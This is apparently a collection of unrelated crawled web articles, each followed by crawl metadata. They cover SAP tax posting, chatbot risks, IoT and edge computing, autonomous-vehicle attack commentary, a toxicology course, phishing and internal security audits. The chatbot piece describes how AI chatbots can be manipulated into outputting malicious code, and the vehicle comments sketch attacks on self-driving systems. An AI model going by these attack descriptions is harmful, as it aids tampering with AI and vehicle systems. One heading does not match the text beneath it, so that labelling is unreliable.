When a transaction with tax is posted, a separate line item is created with the tax amount and this line item is automatically posted. For the tax line item to be posted automatically to a tax account, there are some settings that has to be done for tax account determination. For each and every tax code defined a tax account is assigned so that the system will automatically post to that account when the tax code is used. The posting keys for debiting and crediting are also specified.
Assignment of Tax Category to General Ledger Accounts
When an expense or revenue account is being maintained in the company code segment allowed tax type or condition type has to be specified. For example, if input tax is selected, only input tax codes can be selected when posting to that account. Here it is possible to allow all types of tax codes to be selected when posting to the account.
Picking Tax Code at Document Entry
When a tax type is selected in general ledger master record, a user cannot post to that account without populating a tax code. When a user drill down on tax code box, all tax codes maintained for the company code country will be displayed and the user can choose the appropriate tax code.
Now that we have a clear understanding of how SAP System processes tax, let’s conclude by having a summary of the tax logic. When a user selects a tax code the system will read the tax type or the condition type to which the tax code is assigned. Then the system will check against the master record of general ledger account that the user is posting to and check if the tax type is allowed for the general ledger. If the general ledger allows the selected type of tax type, then the condition type will read the calculation procedure to which it is assigned to and the country assigned to the calculation procedure will be used to check against the country for the company code and the calculation rules will be applied accordingly and if the tax amount is calculated according to the percentage set in tax code, the amount will be posted to the account assigned to the tax code.
Did you like this tutorial? Have any questions or comments? We would love to hear your feedback in the comments section below. It’d be a big help for us, and hopefully it’s something we can address for you in improvement of our free SAP FI tutorials. | <urn:uuid:6854e248-3752-4f6e-ad55-cb54c75dd8e3> | CC-MAIN-2024-38 | https://erproof.com/fi/free-training/sap-fi-tax/ | 2024-09-15T18:45:17Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651647.78/warc/CC-MAIN-20240915184230-20240915214230-00256.warc.gz | en | 0.937328 | 1,026 | 2.640625 | 3 |
Specific Criticism of CVSS4
Dangers Posed by Modern Chatbots
ChatGPT is based on GPT trained with big data to acquire fluency. The ability to provide human-like answers is based on the use of deep learning, which allows to classify language and meaning of sentences. Subsequently, machine learning is used to generate an appropriate response based on the data and information collected during the training process. Thus, the system cannot understand or think in the human sense, but approximates texts that it once learned. For this reason, answers may vary depending on the complexity of the question and the availability of relevant information.
Chatbots interact with humans. In dialog, it may be given that the user discloses sensitive and sensitive data. For example, when an AI-supported quote is to be created and customer-specific details are entered for this purpose. This data becomes accessible to the AI operator and could be misused.
However, self-learning systems can also use these inputs for further processing. Thus, if user A enters details about a customer X, user B could receive those same details as a response to a similar query.
Potential misuse ranges from copyright infringement to social engineering attacks to identity theft and extortion. For this reason, it is recommended to be very careful with sensitive requests. Personal, sensitive and customer-specific information should be avoided as much as possible. Companies should issue guidelines on how such systems may be handled. These guidelines can be based on those already issued for online translation services, for example.
Modern chatbots are trained using existing data sets. This allows them to acquire the relevant knowledge and respond to questions coherently – or at least pretend to be sure of their answers. The quality and quantity of the source material is largely responsible for the quality of the responses. Incorrect or manipulated material can lead to unwelcome effects. For example, untruths can be spread, fueling the concept of Fake News.
A long-term danger, which will grow steadily, is posed by feedback loops. What happens when chatbots are trained on data generated by chatbots? Faulty data is thus amplified and is established by systems as absolute truths.
Responses generated by chatbots must therefore always be checked to ensure that their content is correct. It does not matter whether a short biogarphy, a summary of a news report or a rough offer was generated. A plausibility check of this kind presupposes of course that the user of the system can understand and classify the contents. The generation of results is simple in each case. Classifying and ensuring quality, on the other hand, requires extensive understanding.
A chatbot provider should provide an uncomplicated way to mark faulty dialogs as such and to be able to submit suggestions for changes. This way, the quality of the solution can be increased through the active cooperation of the users.
When training chatbots, the operators define the data set and with it the weighting of the individual statements. This is inevitably linked to a certain tendency subjectivity. Through this it can be given that certain narratives come very ausgepägt to the validity, others are marginalized however. Problematic, offensive and discriminatory effects can be amplified.
When training chatbots, attention must be paid to the quality of the data set. The weighting of individual statements must be carefully worked out, with certain tendencies flagged or rigorously prevented. Unfiltered misogynistic and racist statements as well as the spreading of scurrilous conspiracy theories cannot bring any benefit.
Here, too, providers should provide appropriate functions for reporting problematic content in an uncomplicated manner. These should then be checked, adjusted or prevented in a moderation process.
Large manufacturers such as Microsoft and Google have come under pressure from ChatGPT and do not want to leave the worthwhile market to competitors without a fight. It can be observed that they want to gain an advantage by partially reducing or completely abolishing the ethics teams . This may be the case on a commercial level in the short term. In the long run, however, this decision will take its toll. For with every problematic statement, a system loses trust and acceptance. This cannot be regained without further ado, as research from the area of man-machine trust and trust establishment has shown.
Manipulating or compromising a chatbot can cause it to spread malware. This can happen, as with other applications, via vulnerabilities such as cross site scripting or SQL injection. However, such an attack can also take place on the dataset. If, for example, a chatbot is used for generating program code, manipulation could lead to malicious code being infiltrated and output in dialogs that appear harmless.
Responses from chatbots must therefore always be controlled. The content control must also be carefully implemented for code samples in order to prevent security vulnerabilities in generated code or malicious code parts from being executed in productive environments.
It is not uncommon for a chatbot to come up with an answer that makes amazing sense. Sometimes, however, the opposite is true. Whatever the case, users may feel the need to understand why this particular answer was chosen. But most systems lack transparency of this kind. Instead, it is up to the user to correctly classify and accept a dialog. This lack of insight can lead to a certain bondage. Especially when topics are discussed whose contents and implications cannot be assessed by users, or only to a limited extent.
It must be a declared goal for developers of AI solutions that their products come along with a so-called verbose mode. The user must always have the possibility to demand an explanation for a result. For chatbots, a simple solution is to allow the user to ask a why question: Why did you give this answer? It is then up to the chatbot to show the derivation for the result, in order to be able to give some degree of confidence to its own approach. So far, we are unfortunately further away from current solutions being able to offer mechanisms of this kind.
As with any technology, there are risks associated with its use. It is therefore critical that developers and users are aware of these risks and seek appropriate measures to ensure the security and privacy of data and information shared by chatbots.
Overall, AI-based chatbots in mass now offer exciting possibilities for human-machine interaction. But it remains important to approach with skeptical optimism and prioritize the security of the system and its users.
To minimize risk, it is important to follow best practices in cybersecurity. It is therefore crucial to maintain transparency and accountability in the development and deployment of chatbots, on the one hand with regard to ethical aspects. In doing so, the legal obligations related to the AI Act of the EU must be observed. The Regulation of AI Systems in the EU (also affects all those who want to trade with the EU) may possibly result in a general ban on text-generating systems or very high requirements will be placed on operators, which will also be difficult to fulfill in part for financial reasons.
Our experts will get in contact with you!
Our experts will get in contact with you!
Further articles available here | <urn:uuid:953710ee-7e51-4f24-a6c9-6c7e145a723d> | CC-MAIN-2024-38 | https://www.scip.ch/en/?labs.20230323 | 2024-09-19T10:55:32Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700652028.28/warc/CC-MAIN-20240919093719-20240919123719-00856.warc.gz | en | 0.952826 | 1,452 | 3.609375 | 4 |
For years we’ve heard from industry experts and business leaders about how the Internet of Things will change our daily lives and how we use technology.
Most people use these ‘things’ as they’re called, without realizing it. They include smart appliances which enable you to turn your lights on or off, or even wearable devices, such as smartwatches and fitness trackers.
And the IoT is proliferating firmly at the heart of the Edge. In simple terms, IoT devices gather sensor data and then share it by connecting to an IoT gateway or other Edge device, so the data can be sent to the cloud to be analyzed.
It’s not a recent term either.
The concept of connecting devices to the Internet goes back further than the Internet itself. In 1982, researchers at Carnegie-Mellon University hooked up a modified Coca-Cola machine to Arpanet, one of the precursors of the Internet using the TCP/IP protocol. The machine could report back on its inventory and the temperature of the cans.
The term “Internet of Things” was coined in a speech by Peter T. Lewis, to the Congressional Black Caucus Foundation in Washington, DC in September 1985.
Lewis said: "The Internet of Things, or IoT, is the integration of people, processes, and technology with connectable devices and sensors to enable remote monitoring, status, manipulation, and evaluation of trends of such devices."
This was before Wi-Fi, Bluetooth, and other short-range communications technologies which would eventually make the IoT possible, but the tech industry returned to the idea repeatedly until it started to happen, also using other terms such as M2M - machine to machine.
By 2009, Cisco estimated that there were already more ‘things’ connected to the Internet than people on Earth (then around 6.8 billion).
Today, it’s estimated that there are around 12.2 billion IoT active endpoints globally, according to figures from IoT Analytics, a firm that specializes in market insights for this sector. Humans, meanwhile, have increased to 7.83 billion.
IoT Analytics predicts the number of devices on the Internet will more than double by 2025 to 27 billion.
Is it just hype?
“About a decade ago, IoT became the big new thing and there was a lot of hype,” says IDC IoT industry analyst John Gole.
But have operators fully tapped into the benefits that IoT brings? Gole says that initially, for operators this was a struggle, as there was a lack of an ecosystem in place and the IoT market was in his words ‘immature/’
“All the telcos were rushing in and wanted to take advantage of this big new opportunity, but struggled because it was a challenging environment to be in.”
According to Gole, the mobile network providers felt they had an obligation to drive IoT, and if this was to be the case, the market had to start emerging. At that time, in developed economies, mobile phone use was reaching saturation, and mobile operators were shifting away from just selling mobile phone calls, and offering data instead as the demands for services being texting and calling grew.
Beyond that, once people are using all the data they can, the next logical expansion would be to start connecting devices.
“IoT is not a single use case or single market. Telcos really enjoyed the mobile phone business where essentially everyone in the world needed a mobile phone in the past, but that’s now switched more towards data as demand for this grows.”
His comments echo a report by the GSMA, which effectively says that operators could do more with IoT.
GSMA figures from 2020 estimate that by 2025 the IoT market will be worth a whopping $900bn to the global economy.
However, the same report revealed that connectivity will be worth $48bn, which is just five percent of this overall figure. For context, applications, platforms, and services are tipped to account for 67 percent of the overall market.
According to Iris IoT Solutions managing director Stephen Westley, IoT is the next “golden egg for mobile network operators.”
“Mobile networks are looking at the next revenue stream and IoT is that for them, it’s a golden egg.”
UK-based Iris Solutions provides IoT solutions to its customers, including cold storage trackers, fall sensors, and GPS trackers.
The company works with mobile network operator Vodafone, one of the biggest mobile network operators in the world.
Operators pushing IoT
Despite Westley and others suggesting a vast monetary potential of IoT for operators, are these companies doing enough to tap into this market?
One mobile network operator that has been highly vocal about its IoT and Edge advancements is that name again, Vodafone.
The operator claims to have more than 150 million connections on its global IoT network and has been very active in demonstrating its achievements centered around various use cases.
Whereas a lot of mobile network operators tend to focus heavily on their consumer business and push mobile phone contracts, Vodafone appears to place IoT as a key pillar of its business model.
The UK-based company recently outlined its intentions to develop a new mass-market precise positioning system that can locate IoT devices, machinery, and vehicles.
This scheme will initially be piloted in the UK, Germany, and Spain, and is expected by Vodafone to provide better accuracy than just using only individual global navigation satellite systems (GNSS).
Vodafone claims that location accuracy will improve from a few meters to just centimeters, using Topcon's European network, which is comprised of thousands of GNSS reference stations.
“As new technologies like autonomous cars and connected machinery continue to evolve, Vodafone is providing the critical connections to support these new services with greater precision, more safety, and at scale," said Vodafone Business director for platforms and solutions Justin Shields in early September.
Beyond Vodafone, there are plenty of other examples of operators getting stuck into the opportunities afforded by IoT.
Deutsche Telekom and T-Mobile US recently demonstrated a different type of IoT use case, combining with cleaning technology and equipment company ICE Cobotics to manage its i-Synergy fleet management software.
Using T-Mobile's IoT, ICE Cobotics will connect and manage more than 7,500 new and existing cleaning units worldwide. This will enable its customers to make better decisions based on near real-time data, while reducing downtime through remote notifications, with performance analyzed from a remote location.
Vodafone has also launched its own dedicated program for businesses called ‘Edge Innovation Programme 2.0’, where businesses can test new use cases and roll out smart services and products using Multi-access Edge Computing (MEC) technology.
This form of the Edge, is designed to bring services and processes closer to the user, or “closer to the Edge”, and moves the data away from the centralized cloud and closer to the edge of the network, so a large part of the processing can be done by Edge resources.
MEC is a relatively new segment of the market, but certainly a growing one. So much so, that Gartner predicts that by next year more than 50 percent of enterprise-generated data will be created and processed outside of the data center or cloud. This figure was less than 10 percent in 2019.
Vodafone has worked with Amazon Web Services (AWS) to launch these MEC services delivered with AWS Wavelength for customers in the UK.
Before this, the operator did several trials with companies across a range of areas, including sports technology, autonomous transport, biometric security, remote virtual reality, and factory automation.
Beyond speed and latency capabilities, Vodafone says that MEC also enhances security, with distributed deployments minimizing the impact of cybersecurity incidents, while cost is reduced, and scale offers increased capacity.
Covid boosted IoT use
The global pandemic has played a big part in IoT adoption, adds Westley, who believes that the need for connectivity and instant data has been driven forward as a result.
“One of the things I think that has opened people's eyes to the power of IoT, and especially since the pandemic, is that we don't need to do as many manual tasks anymore,” he said.
“This is the whole point of IoT, as its purpose is around creating efficiencies, and data for people to give them better insights.”
Some might counter-argue that IoT could reduce job opportunities, with businesses instead focusing on automated systems or even making use of robot workers.
However, Westley shuts down this idea, noting that IoT will instead create other roles.
“The growth of IoT means effectively that job specs are changing, and it means that companies can become more efficient. Most businesses at the moment are overstretched and demand-powered, so having IoT, through things such as sensors that can transmit instant data, helps to alleviate some of these problems.”
“IoT isn’t here to replace manpower, it’s here to better analyze data, and diverge focus elsewhere,” he added.
More specifically relating to Edge, Westley adds that IoT needs to work closely with Edge when it comes to processing data.
“For some of the projects, we’re doing there’s quite a lot of data processing. So if we can get the data on the Edge so that the device is making those decisions this means you’re only sending out the necessary data, and in turn reducing the data levels over the networks, which is good for us, because it helps with things such as battery life. If we’re saving on battery power, it saves us time and money.
“The more processing we can do on the Edge, the better it is for us, and also other IoT companies. It helps us make informed decisions on the Edge, as opposed to the backhaul.”
The technology industry is involved in a massive effort around sustainability, with the demand for data means that data centers are pushed to grow ever bigger, with a corresponding increase in their environmental footprint.
Some of the largest hyperscalers have outlined their ambitions to be more carbon-neutral, including Amazon, Microsoft, and Google.
The arrival of the Edge could be a sign of much more energy used in tech applications. The Edge will clearly have its own footprint, on top of that of the cloud which is housed in centralized facilities.
However, sustainability could actually become a selling point for IoT. Many IoT applications increase efficiencies elsewhere, and produce a positive benefit, sometimes referred to as a “handprint.”
This is backed up by a report conducted by Ericsson which says that the ICT sector as a whole has the potential to cut carbon emissions by up to 15 percent by 2030. The report reckoned that total global emissions would be 63.5 gigatons per year by 2030, and ICT could shave between seven and 15 percent off that.
This figure depends on multiple industrial sectors participating, but most of the benefits, in sectors like agriculture and smart buildings, are very clearly based on the use of IoT.
Westley agrees that IoT will enable long-term and potentially optimistic targets around cutting carbon emissions, making them a reality for businesses.
As well as cutting emissions, Gole adds that the use of IoT properly will enable businesses to make better decisions.
He says that IoT is providing the data to make these decisions for businesses.
“Almost all use cases that I can think of relating to IoT are about providing data for better visibility so that you can make better decisions. A lot of the time, this will link in with efficiencies, such as energy and asset monitoring.” | <urn:uuid:2e8f6a9c-c4b7-4249-a773-22532352d2a8> | CC-MAIN-2024-38 | https://www.datacenterdynamics.com/en/analysis/iot-the-edge/ | 2024-09-20T18:14:09Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725701419169.94/warc/CC-MAIN-20240920154713-20240920184713-00756.warc.gz | en | 0.964436 | 2,461 | 3.203125 | 3 |
Internet of Things (IoT) has revolutionized several industries, opening up new avenues for innovation and economic growth. However, this new era of connectivity has also created a serious battery problem. Billions of batteries are getting thrown out each year, contaminating landfills around the world.
The first step to enabling energy harvesting is to create an ultra-low power connectivity solution. If a device can operate on harvested energy alone, the need for charging or a permanent power cord is eliminated. By combining wireless technology and energy harvesting solutions, true wireless – as in no power cord needed – is a possibility for edge IoT devices.
So, where can this technology be implemented in the day-to-day world? This article will examine five industries – healthcare, hospitality, retail, smart home, and sports – that energy harvesting technology can help make more efficient and sustainable.
A continuous glucose monitor (CGM) is one type of healthcare wearable perfect for energy harvesting technology. While traditional CGMs need to be charged regularly since they are in constant use, energy harvesting means that users no longer have to worry about constantly charging their CGMs. Plus, Bluetooth 5 wireless solutions open up the possibility for remote monitoring, with four times the range of previous Bluetooth generations. This means that doctors can more easily monitor their patients, or parents can monitor their children anytime, anywhere via a browser or smartphone application.
Most hotels use door card readers that are battery-powered. While this offers several advantages (such as the ability to operate even during a power outage), replacing batteries in the hundreds or even thousands of door card readers in a hotel is extremely time-intensive and expensive. Using Bluetooth 5 devices with energy harvesting technology cuts down on maintenance time and total cost of ownership, in additi and hotels’ green initiatives.
Paper tags will soon become a thing of the past as retailers turn to programmable electronic shelf labels (ESLs) and other digital signage. One big benefit of electric signage is that updates can automatically be applied across all products. Still, the downside is that many of these devices are battery-operated, creating a headache when it comes time to swap out the batteries for every ESL in a store. Controlled energy harvesting enables retailers to set up Bluetooth 5 ESLs effortlessly, without worrying about maintenance time down the road – in addition to the cost savings of not having to replace batteries constantly.
Our homes are filled with connected devices, including wearables, smartwatches, fitness trackers, and gaming devices, to name a few. Many of these devices need to be changed often, while others use batteries that need to be charged anywhere from every few months to every few years. With energy harvesting, these connected devices would run for the device’s entire lifetime – saving you the time and hassle of charging your devices and replacing batteries.
Sports Venues and Factory Environments
Location devices are already popular in sports stadiums and factories and will continue to become more popular as more venues turn to energy harvesting solutions. Electronic badges, or eBadges, are another great example. Many facilities already rely on eBadges to allow people to access different parts of their buildings. As sports venues and factories update their existing systems, they will increasingly turn to Bluetooth 5 eBadges with energy harvesting technology.
These five industries represent just a small portion of the markets that will benefit from the implementation of Bluetooth 5 energy harvesting technology. As IoT continues to grow, so will the opportunities for energy harvesting and battery-free connected devices. | <urn:uuid:67e60007-475c-4ae2-a92c-9c3513193d50> | CC-MAIN-2024-38 | https://www.iotforall.com/transforming-iot-with-energy-harvesting | 2024-09-07T10:51:10Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700650826.4/warc/CC-MAIN-20240907095856-20240907125856-00220.warc.gz | en | 0.944836 | 710 | 2.53125 | 3 |
A new European Union Agency for Cybersecurity (ENISA) report has found that autonomous vehicles are “highly vulnerable to a wide range of attacks” that could be dangerous for passengers, pedestrians, and people in other vehicles. Attacks considered in the report include sensor attacks with beams of light, overwhelming object detection systems, back-end malicious activity, and adversarial machine learning attacks presented in training data or the physical world.
Ilya Khivrich, Chief Scientist at Vdoo:
“Resilient and safety-critical systems nowadays must be designed with a potential attacker’s perspective in mind. This problem is especially complicated for systems reliant on machine learning (ML) algorithms, which are trained to behave properly under normal circumstances, and may respond in unexpected ways to engineered manipulation or spoofing of data they receive from the sensors. This is a challenging gap to bridge, and we believe that new tooling will be required to cope with these issues.”
Paul Bischoff, privacy advocate and research lead at Comparitech:
“How easy it is to hack cars depends on the vehicle, what computerized systems are in place, and whether those systems are connected to the internet. A car’s entertainment system is often hooked up to the internet and needs to communicate with any number of sources, so it has a wider attack surface. An autonomous vehicle might need to download system updates over the internet, but it only ever needs to connect to one destination, the update server. That makes securing it a bit easier. Then there are systems that are completely sequestered from the internet that would require physical access to hack. Like many internet-of-things devices, manufacturers often build features first and consider security an afterthought. I think automobile security will continue to improve as time goes on. The ENISA report specifically discusses how AI-driven autonomous driving systems can be tricked into not recognizing or misrecognizing traffic, road conditions, or signs. Autonomous vehicles use painted lines on roads to stay in lane, for example. An attacker could paint false lines on a road or vandalize traffic signs to interfere with the AI. We might see some malicious actors try to hack vehicles and disrupt automated driving AI systems, and those actions could cause traffic accidents. However, we should also consider what incentive a hacker would have to hack a car. There’s no clear or direct financial motive, so I don’t think such attacks will be very widespread or prevalent.”
Chris Hauk, consumer privacy champion at Pixel Privacy:
“Any electronic device with an internet connection or a USB port is a hacking target. I have read reports that a modern luxury vehicle could contain up to 100 million lines of software code. A fully autonomous self-driving vehicle is likely to contain many more lines of code than said luxury vehicle. Much if this code is likely unoptimized and may have not been stringently tested for security holes. This makes a self-driving vehicle an attractive target for the bad actors of the world. The popularity and hype surrounding self-driving vehicles make them an attractive target for hackers searching for another income stream or mischief making target. Hackers could target autonomous cars with malware that could “park” the car, leaving it inactive until a ransom is paid. Theoretically, a hacker could take remote control of a vehicle, stranding the passengers in the middle of a highway or intersection, causing gridlock. Or, like a chapter from a bad science fiction murder mystery, they could remotely drive the vehicle off of a cliff.” | <urn:uuid:05dae470-8f8d-4533-a375-6868254d7adb> | CC-MAIN-2024-38 | https://journalofcyberpolicy.com/news-insights-new-enisa-report-finds-that-autonomous-vehicles-are-highly-vulnerable-to-a-wide-range-of-attacks/ | 2024-09-08T16:11:15Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651013.49/warc/CC-MAIN-20240908150334-20240908180334-00120.warc.gz | en | 0.951662 | 727 | 2.578125 | 3 |
Creator: Johns Hopkins University
Category: Software > Computer Software > Educational Software
Topic: Basic Science, Health
Tag: collaboration, environment, health, medicine, safety
Availability: In stock
Price: USD 49.00
Welcome to the Evidence-based Toxicology (EBT) course.
Interested in what the future will bring? Download our 2024 Technology Trends eBook for free.
In medicine and healthcare, evidence-based medicine has revolutionized the way that information is evaluated transparently and objectively. Over the past ten years, a movement in North America and Europe has attempted to translate this revolution to the field of toxicology. The Center for Alternatives to Animal Testing (CAAT) within the department of Environmental Health and Engineering at the Johns Hopkins Bloomberg School of Public Health hosts the first chair for EBT and the secretariat for the EBT Collaboration on both sides of the Atlantic. Based on the Cochrane Collaboration in Evidence-based Medicine, the EBT Collaboration was established at the CAAT to foster the development of a process for quality assurance of new toxicity tests for the assessment of safety in humans and the environment. Regulatory safety sciences have undergone remarkably little change in the past fifty years. At the same time, our knowledge in the life sciences is doubling about every seven years. Systematic review and related evidence-based approaches are beginning to be adapted by regulatory agencies like the Environment Protection Agency (EPA), the European Food Safety Authority (EFSA), and the US National Toxicology Program. They provide transparent, objective, and consistent tools to identify, select, appraise, and extract evidence across studies. This course will showcase these emerging efforts and address opportunities and challenges to the expanded use of these tools within toxicology. | <urn:uuid:bb30110c-0856-496a-bc98-3e41da8c115f> | CC-MAIN-2024-38 | https://datafloq.com/course/evidence-based-toxicology/ | 2024-09-12T06:18:37Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651422.16/warc/CC-MAIN-20240912043139-20240912073139-00720.warc.gz | en | 0.90989 | 352 | 2.5625 | 3 |
Study Confirms Phishing Scams A Danger To All Users
Phishing scams are attempts to trick users to give out personal information so hackers can then use it to break into accounts and steal their identities. Most phishing scams start with an email that directs users to a website where they’er asked for information like their phone number, physical address and even social security number or banking information. There are a number of tell-tale signs of a phishing email, which makes many people believe they could never fall for one. As Sam Narisi of IT Manager Daily reports, a recent study by the Polytechnic Institute of New York suggests otherwise.
The study consisted of 100 science and engineering students. The students were given a personality test and asked about their computer use and proficiency. The researchers then anonymously sent a phishing scam to their personal accounts. The email included the usual signs of a scam, including misspellings and other errors. Still, 17 students fell for it and willingly gave out personal information.
What this study uncovers is that everyone is at risk to become a victim of a phishing scam. Due to social engineering when developing these scams, and a carelessness by users, even the most educated individual could still be a victim.
This extends to other threats, like malware, that infect your system through careless user actions. When a user isn’t extremely cautious online, bad things happen. This is costly for users on their personal computers at home, but it’s a huge risk for businesses who have to safeguard their entire network from numerous careless users.
Education is a great place to start to protect yourself and your office. Knowing what to look for in a potential cyber threat is important, despite the results of the study. Additional security measures also need to be put in place, however, with the knowledge that, eventually, someone is going to click on the wrong link.
To improve the security on any of your devices, at home or at the office, contact Geek Rescue at 918-369-4335.
October 10th, 2013 | <urn:uuid:dae85863-fb0e-4c88-802a-c9558c6fa348> | CC-MAIN-2024-38 | https://www.geekrescue.com/blog/2013/10/10/study-confirms-phishing-scams-a-danger-to-all-users/ | 2024-09-12T06:23:15Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651422.16/warc/CC-MAIN-20240912043139-20240912073139-00720.warc.gz | en | 0.960687 | 423 | 2.921875 | 3 |
Table of Contents
A data breach is an event in which unauthorised individuals gain access to a company’s computers, networks or mobile devices and steal sensitive data. The goal of theft may be to sell the information on the dark web or use it for identity theft. A successful data breach can have serious consequences for both, that is the companies and their customers because it affects more than just personal information like social security numbers and credit cards; it often includes vital business files as well.
What is an Internal Security Audit?
An Internal Security Audit is a process of evaluating an organisation’s security program and practices. It is an independent, objective assurance and consulting activity designed to add value and improve an organisation’s operations. These audits are conducted by trained auditors whose aim is to provide management with useful information regarding the effectiveness of the organisation’s information security program.
Security audits can be performed on an ongoing basis to ensure that an organisation’s information security procedures stay in line with best practices as well as when there are changes made in the company’s infrastructure (e.g., new software implementation).
Security audits are performed as part of an organisation’s risk management strategy and to ensure that they comply with any laws or regulations that may apply. The audit process includes assessing the organisation’s security posture, identifying risks or areas of non-compliance with policies or procedures, making recommendations for improvement (e.g., eliminating vulnerabilities) and measuring the effectiveness of those improvements over time.
Should Your Company Be Concerned About Data Breach?
The short answer is Yes. Data breaches are a serious matter and can have devastating effects for a business. A data breach is an event in which unauthorised access of information occurs, often due to the actions of malicious attackers or system administrators. Data breaches may expose sensitive personal information such as account numbers, credit cards numbers and social security numbers. They could also expose other confidential documents containing intellectual property or trade secret information that could be used by competitors to gain unfair advantage over your company in the marketplace.
Data breaches can lead to lawsuits, fines and loss of customer trust and loyalty with the potential cost estimated at billions per year globally.
Data Breach: What Causes Them?
Data breaches can be caused by a variety of factors, including human error, malware, and cyber criminals. Data breaches can happen to anyone, but not all data breaches are treated equally. The type of data that was exposed and the number of people affected can determine whether a company is liable for a data breach. In addition, there are laws in place that hold companies accountable for not taking reasonable steps to protect sensitive information from unauthorised access or disclosure.
Data breaches can be caused by human errors such as the accidental loss or theft of a device containing confidential information, as well as malicious intent such as hacking. The most common cause of data breaches is human error, which can happen in any Organisation. For example, an employee might accidentally send an email with confidential data to the wrong recipient or leave a device containing sensitive information unattended and accessible to others.
Data breaches are also caused through malware and viruses that can infect computers and network systems. Malware is a form of software designed to disrupt or damage computers and computer networks. It’s often used by cybercriminals to steal personal data and financial information, such as credit card numbers, Social Security numbers and bank account details.
How to Avoid Data Breach
Conducting regular internal audits is essential to preventing data breaches. Internal audits can help you ensure that your company’s security policies are being followed, that employees are taking precautions to protect sensitive information and that you’re aware of any vulnerabilities in your network. Conducting regular internal audits on your systems and software is one of the best ways to identify vulnerabilities.
Here are just some of the things that regular internal audits help you identify:
- Usage of strong passwords.
- How well employees are trained on information security aspects.
- Usage of antivirus software to protect against viruses and malware and keeping all systems up-to-date.
- Usage of two-factor authentication whenever possible to prevent unauthorised access to your account.
- Implementation of information security systems such as firewalls, intrusion detection systems and encryption to protect data.
- Protection of physical access to your network with secure facilities and controlled building access.
- Implementation of an effective incident response plan for security incidents and training of employees on how to respond to such events, etc.
How to Avoid Breaches Caused by Phishing
Phishing is the most common way for hackers to gain access to your personal data. To avoid being phished, never open emails from unknown senders, click links in unsolicited emails or open attachments in unsolicited emails. Don’t provide any personal or sensitive information via email – instead, go directly to the website you are trying to reach and enter your information there. It’s also important to keep your anti-virus software up-to-date and running. This will help prevent any malware from entering your system.
Security Internal Audit and data breach prevention
An Internal Security Audit is an internal control review of your IT and information security systems. It can be performed on a regular basis (e.g., every year) or in response to specific events such as data breaches or cyber attacks that you may have experienced.
What is the purpose of an Internal Security Audit?
There are several reasons why companies need to conduct an Internal Security Audit. Some of them are:
- Before conducting any new project, it is important to ensure that the current state of your system meets the requirements for what you want to achieve with this project;
- If there are any violations in the way your company handles personal data, then these violations need to be addressed;
- You might want to assess whether all employees understand their information security responsibilities within the organisation and if their behaviours match their understanding;
One of the most important reasons for conducting an Internal Security Audit is to identify vulnerabilities in your IT and information security systems. If you want to make sure that your organisation stays one step ahead of cyber criminals, then regular audits should become part of your security strategy. Some examples of vulnerabilities that may be uncovered during an audit include:
- Outdated software or hardware
- Lack of encryption
- Incorrect configuration settings
If all security weaknesses are fixed before they get exploited by cyber criminals, then you can significantly reduce the risk of a data breach. An Internal Security Audit can help you find and fix these vulnerabilities, thereby minimising your risk of suffering a costly data breach. What’s more, you will be able to show that you take your security responsibilities seriously if an external auditor comes knocking at your door.
The consequences of a data breach can be severe for any organisation, as well as for the people whose private information gets exposed. Even if you aren’t responsible for breaching anyone’s data, you can still suffer from reputational damage that may take years to recover from. If your business suffers a data breach, then you could see your profits drop significantly and maybe even go out of business.
How to Prevent Password Loss, Theft, and Cracking
Another way to prevent the loss, theft and cracking of passwords is to use strong passwords. A strong password is one that:
- Is long and complex, with at least 13 characters
- Does not contain your name, birth date or any other personal information
- Has a mixture of letters, numbers and special characters (e.g., !@#$%^&*)
If you can’t remember your current password, consider writing it down in an encrypted file on an external hard drive or USB stick. You can also set up a secure desktop password manager like LastPass which gives you a random string of characters when needed. Always change your passwords regularly (once a month is best) as well as using multi-factor authentication where possible so that even if someone gets hold of one set of credentials they won’t be able to get into everything else in your online life.
How to Stop Ransomware Security Breaches
You may have heard of ransomware, a type of malware that encrypts files on your computer and then demands payment in order to decrypt them. The ransom is usually paid in the form of bitcoins or other cryptocurrencies, which can be more difficult for law enforcement to trace than cash. But there are ways to protect yourself from ransomware.
The first is to ensure that you have a strong antivirus program installed on your computer. It can help detect and remove malware before it has a chance to encrypt your files. Next, make sure your operating system is up to date. Many ransomware attacks exploit known vulnerabilities in older versions of Windows, so it’s important that you have the latest security patches installed. Finally, keep a backup copy of all your important files somewhere outside of your computer’s hard drive (such as on an external drive or cloud storage). This way, if your computer does get hacked and encrypted by ransomware, you won’t lose any data—just reinstall from your backup copy!
How to Stop Spyware Infiltrations
Spyware is malicious software that instals itself on your computer and collects information about you, such as your passwords, credit card numbers and other personal details. It can also be used to monitor your activity on the web. Spyware is often bundled with free programs that people download from the internet or receive via email attachments.
Once installed, spyware will run in the background of your computer without any indication that it’s there. The most common types of spyware will make themselves known when they start displaying ads on websites that you visit or popping up messages asking for additional permissions (which should never be granted). Once these advertisements start appearing, chances are high that the system has been compromised by some form of malware infection or virus attack; this needs urgent attention if users want to avoid losing their data altogether!
The best way to avoid spyware is to install a quality antivirus program on your computer. These programs are designed specifically to detect and remove any form of malware infection, including spyware. If you already have an antivirus program installed on your system and find that it isn’t protecting you from spyware infections, then it’s time to switch to another one (or upgrade if necessary).
How Configuration Management Can Help You Prevent Data Breaches
Configuration management is a process that ensures that all devices are configured in the same way. Configuration management helps you to prevent data breaches by ensuring that all devices are configured in the same way. It also helps you to identify unauthorised changes to your network.
How to Prevent Data Breaches from Third and Fourth Parties
The best way to prevent data breaches from third and fourth parties is to avoid sharing your data with them. However, if you are required by regulation or law to provide data to another Organisation, then you should take steps to ensure that the data is protected against unauthorised access. One of the simplest ways to do this is by using encryption.
It is also important to verify the security of third parties before engaging with them. If you are not sure how secure a third party is, then you should ask questions before entering into any agreement with them. Conducting in-depth due diligence on third parties can help you to identify potential risks and protect your business. You should also ensure that you carry out regular reviews of all third parties, both internal and external, in order to ensure that they are operating securely.
In this article, we have discussed how internal audits can help you prevent security breaches. The first step is to identify the areas where vulnerabilities exist and then implement the appropriate controls to address them. If your company doesn’t have an internal audit team, then it’s time to start looking for one!
